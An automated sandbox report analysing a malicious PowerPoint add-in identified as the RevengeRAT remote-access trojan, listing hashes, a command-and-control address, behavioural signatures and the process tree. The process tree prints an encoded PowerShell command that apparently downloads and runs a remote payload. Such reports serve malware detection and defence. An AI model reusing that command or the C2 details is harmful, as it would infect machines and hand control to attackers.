Analysis

  • max time kernel
    149s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    05-06-2023 12:36

General

  • Target

    9e726810be94f4426ca470f2054b1324494f4fd53cd3f3901c79b46e481042e4.ppam

  • Size

    19KB

  • MD5

    cbcc937ed1ac2f9cca45d47d7ab44b49

  • SHA1

    4e45051c4e0af07f567407095fbed8cb3e1a032c

  • SHA256

    9e726810be94f4426ca470f2054b1324494f4fd53cd3f3901c79b46e481042e4

  • SHA512

    7d45eb38cd778b82cae617300a0bc8a0033c3978e9727d2a7932098e9b51d7e4df715d4a1dff4a76837a10a148fdac8997c38fb71cb46afd4ac5e1c4a9727ff6

  • SSDEEP

    384:dXPYvQCahPS6U7rbHc1RaICb7PwFkqdKW9rAgZF2o2Z2FoeapDCsx3Dw:VPYryLU7rbHgaIEI5MacgZUhZk8C4zw

Malware Config

Extracted

Family

revengerat

Botnet

NyanCatRevenge

C2

m7.ddns.com.br:5222

Mutex

30c2ac3031a0

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RevengeRAT

    Remote-access trojan with a wide range of capabilities.

  • Blocklisted process makes network request 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\9e726810be94f4426ca470f2054b1324494f4fd53cd3f3901c79b46e481042e4.ppam" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:220
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAuAEkAbgB2AG8AawBlACgAJwANAAoAaAB0AHQAcABzADoALwAvAGQAYwA0ADQANAAuADQAcwB5AG4AYwAuAGMAbwBtAC8AZABvAHcAbgBsAG8AYQBkAC8AWQBlAEEASwBaAFAARABGAC8AUgBFAFYARQBOAEcARQBSAC4AagBwAGcAPwBkAHMAaQBkAD0AdgBkAGcASQBTAHYAbAB3AC4ANgAyADkAYwBiAGQAZgA3ADUAOQAxAGYAOAA5ADIANwAyADMAYQA4AGUANgA0ADAANABlADcANAA3ADgAOQA0ACYAcwBiAHMAcgA9AGIAYgA5ADMAZgA0AGEANgA3AGIANQBlAGQAZAA3AGEANgAwADcANgBiAGQAYgBkADIAZgA1ADAAOABmAGIANABhAGQAZgAmAGIAaQBwAD0ATQBUAGcAMQBMAGoARQAxAE0AeQA0AHgATgB6AFkAdQBNAGoASQAmAGwAZwBmAHAAPQA0ADAADQAKACcAKQA7ACAADQAKAEkAdwBTAFcAWABwAHYAegB0AG4ARABYAHUARgBTAEYARQBlAE8AYQBSAFUATAB2AGQASQBlAFAARwB5AGkASQBiAGgAYQBYAHMATwBTAGsAYgBXAGIAeQBTAEUAYgB3AGMAWgBGAFkADQAKAA==""
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4760
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
        3⤵
          PID:2024

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wvwmzu4r.awe.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/220-189-0x00007FF88BAD0000-0x00007FF88BAE0000-memory.dmp
      Filesize

      64KB

    • memory/220-134-0x00007FF88BAD0000-0x00007FF88BAE0000-memory.dmp
      Filesize

      64KB

    • memory/220-136-0x00007FF88BAD0000-0x00007FF88BAE0000-memory.dmp
      Filesize

      64KB

    • memory/220-137-0x00007FF88BAD0000-0x00007FF88BAE0000-memory.dmp
      Filesize

      64KB

    • memory/220-138-0x00007FF889690000-0x00007FF8896A0000-memory.dmp
      Filesize

      64KB

    • memory/220-139-0x00007FF889690000-0x00007FF8896A0000-memory.dmp
      Filesize

      64KB

    • memory/220-159-0x0000025CCC3F0000-0x0000025CCC5F0000-memory.dmp
      Filesize

      2.0MB

    • memory/220-190-0x00007FF88BAD0000-0x00007FF88BAE0000-memory.dmp
      Filesize

      64KB

    • memory/220-135-0x00007FF88BAD0000-0x00007FF88BAE0000-memory.dmp
      Filesize

      64KB

    • memory/220-188-0x00007FF88BAD0000-0x00007FF88BAE0000-memory.dmp
      Filesize

      64KB

    • memory/220-191-0x00007FF88BAD0000-0x00007FF88BAE0000-memory.dmp
      Filesize

      64KB

    • memory/220-133-0x00007FF88BAD0000-0x00007FF88BAE0000-memory.dmp
      Filesize

      64KB

    • memory/2024-210-0x0000000004F30000-0x0000000004F40000-memory.dmp
      Filesize

      64KB

    • memory/2024-208-0x00000000055E0000-0x0000000005B84000-memory.dmp
      Filesize

      5.6MB

    • memory/2024-204-0x0000000000400000-0x000000000040A000-memory.dmp
      Filesize

      40KB

    • memory/2024-209-0x0000000004F30000-0x0000000004F40000-memory.dmp
      Filesize

      64KB

    • memory/4760-165-0x000002284F910000-0x000002284F932000-memory.dmp
      Filesize

      136KB

    • memory/4760-193-0x0000022868280000-0x0000022868298000-memory.dmp
      Filesize

      96KB

    • memory/4760-192-0x0000022868280000-0x0000022868298000-memory.dmp
      Filesize

      96KB

    • memory/4760-197-0x0000022868280000-0x0000022868298000-memory.dmp
      Filesize

      96KB

    • memory/4760-199-0x0000022868280000-0x0000022868298000-memory.dmp
      Filesize

      96KB

    • memory/4760-201-0x0000022868280000-0x0000022868298000-memory.dmp
      Filesize

      96KB

    • memory/4760-203-0x0000022868280000-0x0000022868298000-memory.dmp
      Filesize

      96KB

    • memory/4760-195-0x0000022868280000-0x0000022868298000-memory.dmp
      Filesize

      96KB

    • memory/4760-205-0x00000228682A0000-0x00000228682A1000-memory.dmp
      Filesize

      4KB

    • memory/4760-177-0x0000022867F20000-0x0000022867F30000-memory.dmp
      Filesize

      64KB

    • memory/4760-176-0x0000022867F20000-0x0000022867F30000-memory.dmp
      Filesize

      64KB

    • memory/4760-175-0x0000022867F20000-0x0000022867F30000-memory.dmp
      Filesize

      64KB